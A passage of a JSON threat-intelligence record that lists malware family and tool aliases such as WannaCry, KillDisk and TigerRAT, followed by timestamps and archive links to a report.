"RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434186, "ts_updated_at": 1775792300, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/efbd423ef9480c50b08956e9b55a31baf9c4c8d6.pdf", "text": "https://archive.orkl.eu/efbd423ef9480c50b08956e9b55a31baf9c4c8d6.txt", "img": "https://archive.orkl.eu/efbd423ef9480c50b08956e9b55a31baf9c4c8d6.jpg" } }